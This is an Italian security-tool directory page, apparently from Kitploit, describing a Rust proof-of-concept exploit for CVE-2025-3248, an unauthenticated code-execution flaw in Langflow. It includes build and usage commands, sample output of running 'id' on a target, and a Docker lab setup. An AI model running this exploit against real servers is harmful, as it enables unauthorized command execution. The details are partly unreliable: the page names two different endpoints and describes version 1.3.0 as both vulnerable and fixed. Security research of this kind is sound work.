Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/b0ysie7e/cve-2025-3248-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubb0ysie7e/cve-2025-3248-poc

CVE-2025-3248-POC

Exploit proof-of-concept basato su Rust per CVE-2025-3248, una RCE critica non autenticata in Langflow tramite /api/v1/validate/code, che consente l'esecuzione arbitraria di comandi.

Vedi Repository
19 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Langflow RCE Exploit - CVE-2025-3248

⚠️ Avviso di non responsabilità
Questo codice è strettamente destinato a scopi educativi e di ricerca esclusivamente. L'uso non autorizzato su sistemi senza esplicita autorizzazione può costituire una violazione della legge.
L'autore non è responsabile per qualsiasi uso improprio o attività malevola che coinvolga questo strumento.


Informazioni sulla Vulnerabilità

CVE-2025-3248 - Critico

Punteggio CVSS: 9.8 | Punteggio EPSS: 92.57% | Pubblicato: 22 maggio 2025

Versioni Interessate

  • Vulnerabili: Tutte le versioni ≤ v1.3.0
  • Corrette: Versioni v1.3.0+

Vettore di Attacco

L'endpoint /api/v1/validate/code accetta codice Python non sanificato e lo esegue direttamente con exec(), senza richiedere autenticazione.

Codice Vulnerabile

root@kitploit:~
# langflow/api/builder/execute.py
exec(code)  # No input validation or sandboxing!

Analisi Tecnica

Langflow espone un endpoint /api/v1/builder/execute_code che prende codice Python fornito dall'utente e lo passa direttamente a exec() nel backend. Poiché non c'è autenticazione né sandboxing, gli attaccanti possono creare payload arbitrari per l'esecuzione di codice.

Esegui exploit

Requisiti

  • Rust 1.70+ (installa tramite rustup)
  • Cargo (gestore di pacchetti Rust)
root@kitploit:~
# Clona repository
git clone <repo-url>
cd CVE-2025-3248-POC

cargo build --release

# ./target/release/CVE-2025-3248-POC
root@kitploit:~
./CVE-2025-3248-POC --url <BASE_URL> --command "<COMMAND>"

Esempio:

root@kitploit:~
❯ ./target/release/CVE-2025-3248-POC --url 'http://192.168.159.137:7860' --command 'id'
[+] Langflow RCE Exploit - CVE-2025-3248
[+] url :http://192.168.159.137:7860, 
[+] Command: id
Status: 200 OK
uid=1000(user) gid=0(root) groups=0(root)   

Configurazione Laboratorio Locale

Avvio Rapido

root@kitploit:~
> cd lab
> sudo docker-compose up -d

> ./target/release/CVE-2025-3248-POC --url 'http://localhost:7860' --command 'whoami'

Arresta Laboratorio

root@kitploit:~
> sudo docker-compose down
Scarica lo strumento